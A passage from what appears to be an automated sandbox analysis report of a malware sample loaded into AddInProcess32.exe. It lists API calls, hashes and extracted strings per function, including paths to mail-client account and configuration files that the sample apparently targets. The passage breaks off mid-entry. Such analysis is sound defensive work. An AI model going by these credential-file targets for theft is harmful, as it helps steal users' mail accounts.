                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                  • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                  • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                  • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                  • __freea.LIBCMT ref: 10008A08
                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                  • __freea.LIBCMT ref: 10008A11
                                                                                                  • __freea.LIBCMT ref: 10008A36
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1414292761-0
                                                                                                  • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                  • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                  • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                  • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • _strlen.LIBCMT ref: 10001607
                                                                                                  • _strcat.LIBCMT ref: 1000161D
                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                  • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1922816806-0
                                                                                                  • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                  • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                  • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                  • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                  APIs
                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$AttributesFilelstrcat
                                                                                                  • String ID:
                                                                                                  • API String ID: 3594823470-0
                                                                                                  • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                  • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                  • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                  • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                  • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3852720340-0
                                                                                                  • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                  • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                  • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                  • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                  • _free.LIBCMT ref: 10005B2D
                                                                                                  • _free.LIBCMT ref: 10005B55
                                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                  • _abort.LIBCMT ref: 10005B74
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 3160817290-0
                                                                                                  • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                  • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                  • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                  • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                  APIs
                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                  • API String ID: 4036392271-1520055953
                                                                                                  • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                  • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                  • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                  • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                  • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                  • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                  • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                  • _free.LIBCMT ref: 100071B8
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 336800556-0
                                                                                                  • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                  • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                  • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                  • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                  • _free.LIBCMT ref: 10005BB4
                                                                                                  • _free.LIBCMT ref: 10005BDB
                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3170660625-0
                                                                                                  • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                  • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                  • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                  • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                  • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                  • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$lstrcat
                                                                                                  • String ID:
                                                                                                  • API String ID: 493641738-0
                                                                                                  • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                  • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                  • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                  • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 100091D0
                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                  • _free.LIBCMT ref: 100091E2
                                                                                                  • _free.LIBCMT ref: 100091F4
                                                                                                  • _free.LIBCMT ref: 10009206
                                                                                                  • _free.LIBCMT ref: 10009218
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                  • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                  • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                  • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 1000536F
                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                  • _free.LIBCMT ref: 10005381
                                                                                                  • _free.LIBCMT ref: 10005394
                                                                                                  • _free.LIBCMT ref: 100053A5
                                                                                                  • _free.LIBCMT ref: 100053B6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                  • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                  • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                  • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 10004C1D
                                                                                                  • _free.LIBCMT ref: 10004CE8
                                                                                                  • _free.LIBCMT ref: 10004CF2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$FileModuleName
                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  • API String ID: 2506810119-760905667
                                                                                                  • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                  • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                  • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                  • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                  • __freea.LIBCMT ref: 100087D5
                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                  • String ID:
                                                                                                  • API String ID: 2652629310-0
                                                                                                  • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                  • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                  • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                  • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                  • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 3177248105-0
                                                                                                  • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                  • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                  • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                  • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strlen
                                                                                                  • String ID: : $Se.
                                                                                                  • API String ID: 4218353326-4089948878
                                                                                                  • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                  • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                  • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                  • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                  APIs
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                    • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
